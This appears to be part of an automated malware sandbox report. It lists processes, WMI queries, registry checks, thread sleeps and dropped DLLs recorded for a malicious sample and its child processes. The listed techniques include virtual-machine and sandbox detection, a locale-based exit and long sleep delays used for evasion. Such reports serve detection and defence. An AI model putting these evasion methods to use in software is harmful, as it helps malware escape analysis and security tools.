                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            barindex
                            Checks if the current machine is a virtual machine (disk enumeration)
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                            Found evasive API chain (may stop execution after checking locale)
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_2-58469
                            Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #1&quot;} where resultclass = Win32_DiskDrive
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Dependent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #1\&quot;&quot;
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                            Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk where DeviceId = &apos;C:&apos;
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_LogicalDisk.DeviceID=&quot;C:&quot;} where resultclass = Win32_DiskPartition
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Dependent=&quot;Win32_LogicalDisk.DeviceID=\&quot;C:\&quot;&quot;
                            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 1790000 memory reserve | memory write watch
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 32C0000 memory reserve | memory write watch
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 17E0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeMemory allocated: 13E35970000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeMemory allocated: 13E4F560000 memory reserve | memory write watch
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 1060000 memory reserve | memory write watch
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2B20000 memory reserve | memory write watch
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 1060000 memory reserve | memory write watch
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 3564
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 6052
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWindow / User API: threadDelayed 4757
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWindow / User API: threadDelayed 4907
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 5113
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 4473
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_0-45181
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcp140[1].dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nss3[1].dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\softokn3[1].dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UIxMarketPlugin.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\driverRemote_debug\relay.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\driverRemote_debug\relay.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\vcruntime140[1].dllJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ypbquxnwoJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\mozglue[1].dllJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\fakJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\driverRemote_debug\UIxMarketPlugin.dllJump to dropped file
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeAPI coverage: 8.5 %
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5420Thread sleep time: -29514790517935264s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5420Thread sleep time: -420000s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -53874s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5420Thread sleep time: -59890s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -57608s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5420Thread sleep time: -59781s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -59111s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5420Thread sleep time: -59671s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -44011s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -47282s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -32657s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -55485s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -43046s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -53111s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -39048s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -46051s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -51437s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6300Thread sleep time: -480000s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -34940s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -48880s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -32908s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -49361s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -30362s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -42157s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -59306s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -47638s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -48814s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -40775s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -55633s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -52352s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -56019s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -33590s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -40863s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -53974s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -33780s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -48195s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -42226s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe TID: 2920Thread sleep time: -29514790517935264s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe TID: 6508Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3712Thread sleep count: 45 > 30
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3712Thread sleep time: -41505174165846465s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3712Thread sleep time: -60000s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -37752s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3712Thread sleep time: -59888s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5316Thread sleep count: 5113 > 30
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -36076s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5316Thread sleep count: 4473 > 30
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3712Thread sleep time: -59777s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -43255s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -36426s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -48677s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -49214s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -46805s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -59171s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -49003s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -50551s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -51632s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -30288s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -40188s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -50369s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -34545s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -32290s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -33848s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -47786s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -58405s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -34941s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -33907s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -38409s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -51860s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -51359s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -40632s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -58117s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -50533s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -32745s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -49953s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -56784s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -50232s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
